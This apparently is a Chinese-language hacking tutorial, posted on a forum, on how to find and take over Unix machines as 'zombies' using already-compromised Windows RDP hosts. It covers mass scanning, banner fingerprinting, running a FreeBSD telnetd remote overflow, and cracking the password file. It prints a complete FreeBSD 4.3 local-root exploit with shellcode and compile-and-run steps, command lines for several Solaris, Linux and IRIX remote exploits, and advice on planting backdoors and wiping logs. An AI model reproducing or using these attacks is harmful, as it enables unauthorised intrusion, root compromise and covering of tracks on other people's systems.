如何寻找自己的UNIX肉鸡

韩冰

今天的话题是怎么样找unix肉鸡，我想这对于一个有很多windows肉鸡而没有unix肉鸡的人是很有必要。
+ L$ S8 F  Y6 R, }. [" @不罗嗦，直入正题。为什么说是我和x-laser一起找肉鸡呢？因为我们的一切操作全部是在3389肉鸡上进行的。首先我们都上到同一个终端，(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理进行id切换(选择用户进行连接)
" l0 C- D3 d7 z0 n4 e0 [* S
9 B' c; {7 y$ t' v1 y" Q( Q8 j    这样，两个人就可以互相控制对方了，一举一动都很清楚，这种方法很好，大大提高了效率，也增加了入侵时的乐趣。建议大家推广 ：）
/ `9 }( t3 n- W1 [, |    下面我们开始工作。由于是在win上搞unix类，所以我们最好要有在win上用的exploit，以得到第一台unix肉鸡。关于在win上用的exploits可以用cygwin编译（在www.isfocus.com）有下载。或者直接去大鹰的主页（e4gle.org）或者红客技术联盟（www.cnhonker.net/old.php）下载，注意了，要一起下那个cygwin1.dll的文件，不然搞不成。
现在我们要做的是找出大量unix的肉鸡，然后再去找漏洞，但是怎么找呢？这时候，就请出了我们的languard network scanner，在做了简单的设置让他跑的快点后，我们就开始扫描

9 H% ?- R( {: u  z- i. G
我们看到有一台freebsd，这个系统比较好欺负，因为前段时间有个沸沸扬扬的telnetd远程溢出漏洞。当然我们也可以用superscan来快速判断操作系统.我们用superscan扫23端口,因为telnet上去一般都有banner,从而得知操作系统类型.如下

) A- p- m% V5 L9 N# Q$ l; L我们扫到了两台linux,….. ..#..’是linux的判断符.
) ^* X  i) f3 [2 K; R; K1 N……..#..’..$则是sunos的判断符,如此等等,大家用用就有经验了.


) ~# C# K6 ~- E3 |5 J) [言归正转,来看我们的freebsd.我们在红盟下好bsd.exe和cygwin1.dll后，就开始溢出了。

' j8 S" c) a7 q. E5 }' D  D& U% J0 p7 ?由于要发送16M的东西，所以可能会慢点
; `, o  _. C; c% t4 [6 h等到成功后，会出现 command ？
这是输入 id
可以看到自己已经成为root了。当然，大家还可以把shadow抓下来，bsd下的sh
' x3 [" r( s7 H. Badow文件是/etc/master.passwd，然后john跑个用户名出来（在www.xfocus.net有john的windows下的版本下载，也是用cygwin编译的），再telnet上去，就得到了普通帐号(因为root帐号一般比较难破)，再进行本地溢出。为什么要这么麻烦呢？因为我们远程得到的shell很多都没有回显，所以不方便添加帐号。一般在bsd下添加帐号是在/usr/sbin下执行./adduser ，然后按着提示做就可以了，bsd系统很稳定，很多大型网站都是用这个建站，比如红盟。本地溢出的代码我在这里贴一下
8 z* O; n9 T1 w" n; `
( u1 |0 I7 L6 t) T% \/ i0 V?受影响版本： FreeBSD 4.3 4.2 4.1 4.0
早期版本也许受影响 测试程序使用方法：  </P>
netdemon%gcc -o vvbsd vvbsd.c netdemon%cp /bin/sh /tmp netdemon%./vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=61056 login: login: # done # 　　 </P>
7 C4 N  K% t8 x) h0 I% Q发现 FreeBSD 4.3 存在一个设计上的漏洞，它允许用户在其它进程中插入 signal handlers。 </P>
/ N  ?; G" ~+ E! r& E题出在 rfork(RFPROC|RFSIGSHARE) ，如果子进程 exec() 一个 setuid 程序，然后父进程设置一个 signal handlers，这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。 利用此漏洞，本地攻击者能取得 root 权限。 vvfreebsd.c

    ???? /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski http://www.guninski.com */ #include &lt;stdio.h&gt; #include &lt;signal.h&gt; #include &lt;unistd.h&gt; int vv1; #define MYSIG SIGINT //exec "/tm
    p/sh", shellcode gotten from the internet and modified unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" "\x31\xc0\x50\x50\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; typedef (*PROG)(); extern char **environ; int main(int ac,char **av) { int pid; //(*(PROG)bsdshell)(); if(!(vv1=getenv("vv"))) { setenv("vv",bsdshell,1); if(!execle(av[0],"vv",NULL,environ)) { perror("weird exec"); exit(1); } } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(!(pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) if(!execl("/usr/bin/login","login",0)) { perror("exec setuid failed"); exit(2); }; } sleep(2); signal(MYSIG,(sig_t)vv1); sleep(2); kill(pid,MYSIG); printf("done\n"
8 L  s  V' b3 ]: r$ w, Y4 ^); while(42); } </P>
- G4 a0 x3 T+ N9 n" w: _* Y/* www.xcode.tw.st 极端网络安全小组 */
7 e/ A. j4 i( V0 Z% V9 \. ]7 M
( @; q+ }6 o' t/ [+ t! I
: W. d! P! D. R# D可以找到可写的地方，然后cat &gt;vv.c 回车
(鼠标右健粘贴)
* x, \2 @3 ~2 Ictrl + d保存
! N: K2 z6 C+ y0 A/ g$gcc –o vv vv.c编译(gcc在solaris和aix等系统下叫做cc)
3 q6 t. Z( ?( _$ v  @- |+ I$cp /bin/csh /tmp
3 R% I' y+ T' K  e- g$./vv
这样就执行了,一般可以得到root.注意第二句,这是代码的需要
然后就去adduser然后再放一堆后门上去吧
几点补充:1.命令w查看当前哪些在线,要是看见root就要小心了
- m  |; a( Y  j0 x1 |8 {9 I2
( }+ {# E/ s3 K9 h.Whereis gcc查看装了gcc没有,whereis的用法很灵活
1 V0 S* Y& x* g% _, E! j+ @* j3如果没装就需要把编译好的传上去,我们一般是申请一个ftp,然后编译好,传到ftp上,在让攻击的机子去下载(51.net的虚拟主机就可以完成这项任务)
  r0 a; ~" f( J, Y2 ~+ A4记得每次上去要用wipe清理足迹,wipe在小凤居有下载
. S& l) X0 w) n- z6 u　</P>
* K' r9 W+ I8 |+ V7 Z' t另外再附几种常见的exploit的用法
% o" m1 J/ O! Y, q: W% G, o
2 I9 F* z! p. e: m4 O
  ]( R( f* a# T: t8 B$ {目标主机一律用128.0.0.1代替！ 1 statdu[vdp]redhat6.xrpc status远程溢出！ </P>
' N6 k/ O2 J! V1 [4 A溢出程序： statdx 用法： </P>
  ~0 F1 t, c+ S9 G. M( P' K5 K* W- D./statdx -d 0 128.0.0.1或者 </P>
./statdx -d 1 128.0.0.1或者 </P>
0 U6 p$ I/ W0 `& F+ \( W. V+ X/ G./statdx -d 2 128.0.0.1 </P>
, o9 Y* G4 g! }2 sadmind[vdp]sun solaris sparc 2.6.2.7远程溢出 </P>
溢出程序： sadmindxbrute 用法 </P>
! S4 F( k) O* J) [./sadmindxbrute (主机类型参数) 128.0.0.1 主机参数 1 x86 2.6 2 x86 7.0 3 sparc 2.6 4 sparc 7.0 3 ttdb[tcp]sun solaris 2.3 2.4 2.5 2.5.12.6远程溢出  </P>
所用程序 ttds（已经改名）流光iv的exploit内可以找到 </P>
% a* ?% o4 h' Z7 A1 ^" \3 t3 k: ^用法： ./ttds 128.0.0.1 80（攻击断口设置为80）-v6 4 snmp[bdp]sun solaris sparc 7.0/8.8远程溢出 </P>
' I5 Q, @$ N6 Z7 n9 {所用程序 snmpxmid </P>
用法： ./snmpxmid 128.0.0.1 -v 7 5 bind 远程溢出 </P>
程序bind </P>
用法： ./bind 128.0.0.1 -e 6 irix的telnet远程溢出（这个可能用流光iv扫描不到） </P>
2 W3 q1 i; \7 E) k, d: b- ]所用程序telnetd </P>
5 z, g, I2 h6 L% T2 u# `  Z: Z用法： ./telnetd 128.0.0.1 7 utofsd[vdp]bsd autofsd远程溢出,tcp 530 root shell </P>
所用程序 utofsd </P>
8 U0 w3 y$ N% E+ {用法： ./utofsd 128.0.0.1 8 freebsd远程溢出 </P>
. h4 @, w: u; h6 c7 u) \这个可以通过www.paching.net/liumy写的bsd攻击程序在winnt下使用方法 bsd 128.0.0.1 其他的远程溢出程序也不麻烦 你只要把程序编译好之后输入 ./程序名 --h就可以看到帮助了！

   补充一点，很多写exploit的牛人为了让自己的exploit给真正的黑客用，故意在代码里放了几个错误，所以大家还是要学好编程的这样,就可以根据gcc编译器的错误提示把错误的代码改过来。今天我们讲了怎样找unix类肉鸡,当然还是要看运气,不过我和x-laser在3389肉鸡扫描很疯狂,用superscan一次一般是扫255个c段用languard也扫的很多,所以建议大家多多实践.最后,奉劝一句,不要入侵国内,不要搞破坏! </P>